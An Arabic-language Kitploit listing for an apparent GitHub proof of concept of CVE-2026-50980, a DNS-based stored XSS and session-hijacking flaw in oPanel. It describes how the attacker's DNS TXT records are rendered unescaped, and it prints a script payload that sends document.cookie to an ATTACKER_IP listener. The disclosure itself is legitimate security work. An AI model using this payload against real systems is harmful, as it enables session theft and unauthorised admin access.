Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-50980 — oPanel هجمات النص البرمجي عبر المواقع (XSS) المستندة إلى DNS وخطف الجلسات | Kitploit
أدوات/GitHubGitHub/bugresearch/cve-2026-50980
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويبتحليل DNS
GitHubbugresearch/cve-2026-50980

CVE-2026-50980

oPanel هجمات النص البرمجي عبر المواقع (XSS) المستندة إلى DNS وخطف الجلسات

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-50980: برنامج النص بين المواقع (XSS) واختطاف الجلسة المستند إلى DNS في oPanel

نظرة عامة

  • معرف CVE: CVE-2026-50980
  • المنتج: oPanel
  • الإصدارات المتأثرة: < v1.20.25
  • نوع الثغرة: برنامج النص بين المواقع المخزّن (Stored XSS) عبر DNS / اختطاف الجلسة
  • الخطورة: عالية (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N)

الوصف

توجد ثغرة برنامج النص بين المواقع (XSS) في oPanel (الإصدارات الأقدم من v1.20.25) بسبب المعالجة غير السليمة وتنظيف استجابات DNS. عندما يقوم اللوحة بإجراء استعلام DNS (مثل استرداد معلومات المجال، أو التحقق من انتشار DNS، أو الاستعلام عن سجلات TXT) ضد خادم أسماء يسيطر عليه المهاجم، فإنها تعكس سجلات DNS التي تم إرجاعها مباشرة في واجهة الويب دون ترميز HTML كافٍ.

يمكن للمهاجم استغلال ذلك عن طريق تكوين خادم DNS خبيث للاستجابة لاستعلامات سجلات TXT بحمولة JavaScript ضارة. عندما يقوم مستخدم مصادق عليه في oPanel (مثل المسؤول) بعرض الصفحة التي تُعرض فيها استجابة DNS، يتم تنفيذ الحمولة في سياق جلسة متصفحه.

التأثير

يسمح الاستغلال الناجح للمهاجم بتنفيذ JavaScript عشوائية في متصفح الضحية. كما هو موضح في برهان المفهوم، يمكن استخدام هذا لسرقة ملفات تعريف الارتباط المصادقة الحساسة (document.cookie)، مما يؤدي إلى اختطاف كامل للجلسة والوصول الإداري غير المصرح به إلى بيئة oPanel.

برهان المفهوم (PoC)

يتطلب الاستغلال من المهاجم إعداد خادم DNS خبيث ومستمع HTTP لالتقاط البيانات المسربة.

1. إعداد البنية التحتية للمهاجم

يقوم المهاجم بتشغيل خادم DNS خبيث على المنفذ UDP 53 ويكون مهيئًا للاستجابة لأي استعلام TXT بحمولة XSS.

حمولة سجل TXT الخبيثة:

root@kitploit:~
<script>new Image().src='http://<ATTACKER_IP>:<HTTP_PORT>/log?cookie='+document.cookie;</script>
تنزيل الأداة